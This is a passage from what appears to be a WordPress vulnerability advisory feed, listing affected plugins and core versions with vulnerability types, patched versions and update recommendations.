Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Transposh WordPress Translation

Vulnerability: Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery by BestWebSoft – Customizable Image and Photo Galleries for WordPress

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: eDoc Employee Job Application – Best WordPress Job Manager for Employees

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Missing Authorization on tptn_chart_data
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: product-catalog-8

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Local File Inclusion
Patched Version: 1.3.65
Recommended Action: Update to version 1.3.65, or a newer patched version

Plugin: iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more

Vulnerability: Failure to Restrict URL Protocol
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Core: WordPress

Vulnerability: Remote Code Execution
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: MashShare – Social Media Share Buttons, Social Share Icons

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Stylish Price List – Price Table Builder & QR Code Restaurant Menu

Vulnerability: Arbitrary Image Upload
Patched Version: 6.9.0
Recommended Action: Update to version 6.9.0, or a newer patched version

Plugin: RapidExpCart

Vulnerability: Authenticated (Level 8/Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Gravity Forms HubSpot

Vulnerability: Various Plugins (Various Versions)
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: VideoWhisper Video Presentation

Vulnerability: Arbitrary File Upload
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Email Marketing for WooCommerce by Omnisend

Vulnerability: Sensitive Information Exposure
Patched Version: 1.13.9
Recommended Action: Update to version 1.13.9, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease!

Vulnerability: Unauthorized Form Submission via Disabled Forms
Patched Version: 2.0.3.1
Recommended Action: Update to version 2.0.3.1, or a newer patched version

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Unauthenticated CSV Injection
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Information Disclosure
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Perfmatters

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Authenticated (Admin+) Cross-Site Scripting and Missing Authorization Checks
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: My Geo Posts Free

Vulnerability: PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redirect 404 to parent

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via give_form_grid shortcode
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Login/Signup Popup ( Inline Form + Woocommerce )

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.77.33
Recommended Action: Update to version 1.0.77.33, or a newer patched version

Plugin: Frontend Post WordPress Plugin – AccessPress Anonymous Post

Vulnerability: Authenticated (Contributor+) Arbitrary Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Omni Secure Files

Vulnerability: Arbitrary File Upload
Patched Version: 0.1.14
Recommended Action: Update to version 0.1.14, or a newer patched version

Plugin: I Recommend This

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.9.0
Recommended Action: Update to version 3.9.0, or a newer patched version

Plugin: KONTXT Content Advisor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Mingle Forum

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.34
Recommended Action: Update to version 1.0.34, or a newer patched version

Plugin: Timely All-in-One Events Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Fluid Responsive Slideshow

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: TrustMate.io – WooCommerce integration

Vulnerability: Authenticated (Subscriber+) Arbitrary Blog Option Update
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery to Designation Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Arbitrary File Upload
Patched Version: 8.3.8
Recommended Action: Update to version 8.3.8, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: TWChat – Send or receive messages from users

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Enable/Disable Dark Mode
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: WP Popups – WordPress Popup builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.4.9
Recommended Action: Update to version 2.1.4.9, or a newer patched version

Plugin: WP Symposium

Vulnerability: Cross-Site Scripting
Patched Version: 14.11
Recommended Action: Update to version 14.11, or a newer patched version

Plugin: Copperleaf Photolog

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Open Redirect
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WP-Recall – Registration, Profile, Commerce & More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 16.24.48
Recommended Action: Update to version 16.24.48, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Unauthenticated CSV Injection
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Find Slow Functions & Actions & Filters & Hooks (Debug Bar)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.41
Recommended Action: Update to version 1.41, or a newer patched version

Plugin: Companion Sitemap Generator – HTML & XML

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Goolytics – Simple Google Analytics

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: GD Rating System

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WPPizza – A Restaurant Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.18.3
Recommended Action: Update to version 3.18.3, or a newer patched version

Plugin: WP Admin Logo Changer

Vulnerability: Plugin’s Settings Update via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Remove/hide Author, Date, Category Like Entry-Meta

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Hover Effects – Elementor Addon

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Link Library

Vulnerability: Cross-Site Request Forgery to Library Settings Reset
Patched Version: 7.2.8
Recommended Action: Update to version 7.2.8, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Multiple Reflected Cross-Site Scripting
Patched Version: 1.5.69
Recommended Action: Update to version 1.5.69, or a newer patched version

Plugin: link-list-manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gumroad

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SchedulePress – Auto Post & Publish, Auto Social Share, Schedule Posts with Editorial Calendar & Missed Schedule Post Publisher

Vulnerability: Insufficient Authorization to Authenticated (Contributor+) Arbitrary Post Modifications
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Information Disclosure
Patched Version: 2.5.97
Recommended Action: Update to version 2.5.97, or a newer patched version

Plugin: Event Registration

Vulnerability: SQL Injection
Patched Version: 6.00.03
Recommended Action: Update to version 6.00.03, or a newer patched version

Plugin: WhyDoWork AdSense

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Authentication Bypass
Patched Version: 4.1.7
Recommended Action: Update to version 4.1.7, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: YITH WooCommerce Gift Cards Premium

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.20.0
Recommended Action: Update to version 3.20.0, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via AJAX action
Patched Version: 1.3.7.5
Recommended Action: Update to version 1.3.7.5, or a newer patched version

Plugin: Schema – All In One Schema Rich Snippets

Vulnerability: All In One Schema Rich Snippets <= 1.4.4
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: WordPress + Microsoft Office 365 / Azure AD | LOGIN

Vulnerability: Stored Cross-Site Scripting
Patched Version: 15.4
Recommended Action: Update to version 15.4, or a newer patched version

Plugin: Fast WP Speed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pricing Tables WordPress Plugin – Easy Pricing Tables

Vulnerability: Arbitrary Post Removal via Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Advanced Custom Fields Frontend Forms – ACF Forms – ACF Post Form – ACF Registration Form – ACF Content Form – ACF Profile Form

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Second Street

Vulnerability: Stored Cross-Site Scripting via organization_id
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: Easy Captcha

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Authenticated (Subscriber+) LDAP Injection
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Remote Command Execution
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Open Redirect
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: BuddyPress

Vulnerability: Authorization Bypass
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authorization Bypass
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: WP BlipBot

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Restriction WordPress (WP) – Protect WP Pages/Post

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Flexible Custom Post Type

Vulnerability: Cross-Site Scripting
Patched Version: 0.1.7
Recommended Action: Update to version 0.1.7, or a newer patched version

Plugin: Vertical marquee plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 7.2
Recommended Action: Update to version 7.2, or a newer patched version

Plugin: Post to Social Media – WordPress to Hootsuite

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: anyfont

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Restricted Site Access

Vulnerability: Access Bypass via IP Spoofing
Patched Version: 7.3.2
Recommended Action: Update to version 7.3.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Email Address Disclosure
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Uncanny Toolkit for LearnDash

Vulnerability: Missing Authorization via review-banner-visibility REST route
Patched Version: 3.6.4.4
Recommended Action: Update to version 3.6.4.4, or a newer patched version

Plugin: External Media without Import

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Easy Digital Downloads – Manual Purchases

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: FundEngine – Donation and Crowdfunding Platform

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Maps Plugin using Google Maps for WordPress – WP Google Map

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: Custom Content Type Manager

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 0.9.8.6
Recommended Action: Update to version 0.9.8.6, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Referer Cross-Site Scripting
Patched Version: 12.6.4
Recommended Action: Update to version 12.6.4, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Authentication Bypass
Patched Version: 7.11
Recommended Action: Update to version 7.11, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.9.90
Recommended Action: Update to version 0.9.90, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated (Admin+) Limited Remote Code Execution via um_populate_dropdown_options
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Theme Activation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: CBX Bookmark & Favorite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.14
Recommended Action: Update to version 1.7.14, or a newer patched version

Plugin: WP Crowdfunding

Vulnerability: Missing Authorization via settings_reset
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Remove Footer Credit

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Kv TinyMCE Editor Add Fonts

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: StaffList

Vulnerability: Authenticated SQL Injection
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Logaster Logo Generator

Vulnerability: Cross-Site Request Forgery to Arbitrary Media Deletion and Creation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-dTree

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Embed Youtube Video

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Plugin: Display custom fields in the frontend – Post and User Profile Fields

Vulnerability: Missing Authorization via vg_display_data shortcode
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Subscribe To Comments Reloaded

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 150820
Recommended Action: Update to version 150820, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Information Exposure
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: Mass Delete Taxonomies

Vulnerability: Cross-Site Request Forgery via mp_plugin_mass_delete_tags_init
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: WP Custom Fields Search

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.35
Recommended Action: Update to version 1.2.35, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Authenticated (Contributor+) Arbitrary File Upload
Patched Version: 1.5.67
Recommended Action: Update to version 1.5.67, or a newer patched version

Plugin: Classic Editor and Classic Widgets

Vulnerability: Cross-Site Request Forgery via render_settings_page
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Insight Core

Vulnerability: Authenticated PHP Object Injection & Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mercado Pago payments for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: MailArchiver

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Auto Delete Posts

Vulnerability: Cross-Site Request Forgery to Arbitrary Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Unauthenticated Sensitive Information Exposure via ai-debug-processing-fe
Patched Version: 2.7.31
Recommended Action: Update to version 2.7.31, or a newer patched version

Plugin: IMPress for IDX Broker

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Error Log Viewer by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: SQL Injection
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Allow svg files

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Academic People List

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.3.12
Recommended Action: Update to version 3.3.12, or a newer patched version

Plugin: eRoom – Zoom Meetings & Webinars

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Cross-Site Request Forgery to Feedback Submission
Patched Version: 1.3.32
Recommended Action: Update to version 1.3.32, or a newer patched version

Plugin: Powerkit – Supercharge your WordPress Site

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: Caldera Forms Pro

Vulnerability: Missing Authorization
Patched Version: 1.7.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.7.7, 1.8.2

Plugin: WP Helper Premium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Image Slider by NextCode – Photo & Video Slider

Vulnerability: Cross-Site Request Forgery to Slide Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Connections Business Directory

Vulnerability: Cross-Site Scripting
Patched Version: 0.7.9.4
Recommended Action: Update to version 0.7.9.4, or a newer patched version

Plugin: WebToffee WP Backup and Migration

Vulnerability: Missing Authorization via wt_delete_schedule
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: SlickNav Mobile Menu

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Magic Action Box

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Maps Marker Pro

Vulnerability: Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Advance WordPress Search Plugin

Vulnerability: Missing Authorization to Plugin Settings Reset
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Real Media Library: Media Library Folder & File Manager

Vulnerability: Authenticated (Author) Stored Cross-Site Scripting
Patched Version: 4.14.2
Recommended Action: Update to version 4.14.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Comments
Patched Version: 4.0.4
Recommended Action: Update to one of the following versions, or a newer patched version: 4.0.4, 4.1.4, 4.2.1

Plugin: AIT CSV import/export

Vulnerability: Arbitrary File Upload
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: SQL Injection
Patched Version: 3.45
Recommended Action: Update to version 3.45, or a newer patched version

Plugin: Improved Include Page

Vulnerability: Authenticated (Contributor+) Arbitrary Posts/Pages Access
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form by FormGet – Best Form Builder Plugin for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: Export customers list csv for WooCommerce, WordPress users csv, export Guest customer list

Vulnerability: CSV Injection
Patched Version: 2.0.69
Recommended Action: Update to version 2.0.69, or a newer patched version

Plugin: Product Import Export for WooCommerce – Import Export Product CSV Suite

Vulnerability: Authenticated (Shop Manager+) Arbitrary File Upload via upload_import_file
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: secupress-pro

Vulnerability: Unauthenticated Arbitrary IP Ban
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Image Gallery with Slideshow Plugin

Vulnerability: SQL Injection via gid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woocommerce Order Barcodes

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: YITH Maintenance Mode

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WP Advanced Importer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: WPRealty

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Log WP_Mail

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stock Sync for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Ripe HD FLV

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Transposh WordPress Translation

Vulnerability: Reflected Cross-Site Scripting via tp_tp
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: EZPZ One Click Backup

Vulnerability: Unauthenticated Command Injection
Patched Version: No patched version available
